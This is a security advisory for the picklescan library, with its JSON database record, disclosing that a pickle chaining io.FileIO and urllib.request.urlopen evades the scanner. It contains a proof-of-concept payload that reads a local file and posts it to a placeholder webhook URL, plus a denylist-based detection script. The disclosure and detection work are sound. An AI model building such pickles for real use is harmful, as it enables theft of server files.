GHSA-9726-W42J-3QJR

Vulnerability from github – Published: 2026-01-08 17:25 – Updated: 2026-01-08 17:25
Summary
picklescan has Arbitrary file read using `io.FileIO`
Details

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

  1. io.FileIO: Opens local files without using builtins.open.

  2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.

  3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

```python
import pickle, io, urllib.request

class GetFile:
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))

class Exfiltrate:
    def __reduce__(self):
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))

with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)
```
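A static check for the chain described above, added here as an example and not taken from picklescan's own code: it walks the pickle opcodes with `pickletools.genops`, lists every import the stream requests, and flags the two callables from this advisory without ever unpickling the data. The `FLAGGED` denylist, the function names, and the sample path and URL are assumptions constructed for the example.

```python
import io
import pickle
import pickletools
import urllib.request

# Assumed denylist for this example: the two callables the advisory chains.
# "_io" is listed too because CPython pickles io.FileIO under its defining module.
FLAGGED = {
    ("io", "FileIO"): "local file read",
    ("_io", "FileIO"): "local file read",
    ("urllib.request", "urlopen"): "outbound request",
}

def list_globals(data: bytes):
    """Return the (module, name) imports a pickle requests, without loading it."""
    found, strings, memo, last = [], [], {}, None
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("GLOBAL", "INST"):        # protocols 0-3: "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":          # protocol 4+: two stacked strings
            found.append(tuple(strings[-2:]) if len(strings) >= 2 else ("?", "?"))
        elif "UNICODE" in op.name or "STRING" in op.name:
            strings.append(arg)
            last = arg
            continue
        elif op.name == "MEMOIZE":               # memo index is implicit
            memo[len(memo)] = last
            continue
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
            continue
        elif op.name in ("GET", "BINGET", "LONG_BINGET") and isinstance(memo.get(arg), str):
            strings.append(memo[arg])            # string reused from the memo
        last = None
    return found

def scan(data: bytes):
    """Map each flagged import found in the pickle to the reason it is flagged."""
    return {g: FLAGGED[g] for g in list_globals(data) if g in FLAGGED}

class _File:  # constructed sample with the same shape as the PoC above
    def __reduce__(self):
        return (io.FileIO, ("/constructed/sample", "r"))

class _Send:
    def __reduce__(self):
        return (urllib.request.urlopen, ("http://collector.invalid/", _File()))

SAMPLE = pickle.dumps(_Send(), protocol=4)  # serialised only, never unpickled
```

A denylist like this catches only the callables someone thought to list, which is how this chain passed RCE-focused checks. Comparing the output of `list_globals` against an allowlist of expected imports fails closed instead.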


Impact

  • Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE-type vulnerabilities, and that adding file I/O, HTTP, or other protocol-based checks may cause a lot of noise, feel free to close this issue.


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "picklescan"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-08T17:25:35Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nUnsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.\n\n### Details\nThe application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:\n\n1. io.FileIO: Opens local files without using builtins.open.\n\n2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.\n\n3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.\n\n### PoC\n\n```python\nimport pickle, io, urllib.request\n\nclass GetFile:\n    def __reduce__(self):\n        return (io.FileIO, (\u0027/etc/hosts\u0027, \u0027r\u0027))\n\nclass Exfiltrate:\n    def __reduce__(self):\n        return (urllib.request.urlopen, (\u0027https://webhook.site/YOUR_UUID_HERE\u0027, GetFile()))\n\nwith open(\"bypass_http.pkl\", \"wb\") as f:\n    pickle.dump(Exfiltrate(), f)\n```\n\n\u003cimg width=\"650\" height=\"114\" alt=\"Screenshot 2025-12-30 at 10 13 14\u202fPM\" src=\"https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994\" /\u003e\n\n\n### Impact\n\n- Arbitrary file read\n\nThanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kind of vulnerabilities rather adding `File IO`, `Http` or any protocol based may cause lot of noise, feel free to close this issue.",
  "id": "GHSA-9726-w42j-3qjr",
  "modified": "2026-01-08T17:25:35Z",
  "published": "2026-01-08T17:25:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/pull/55"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mmaitre314/picklescan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "picklescan has Arbitrary file read using `io.FileIO` "
}

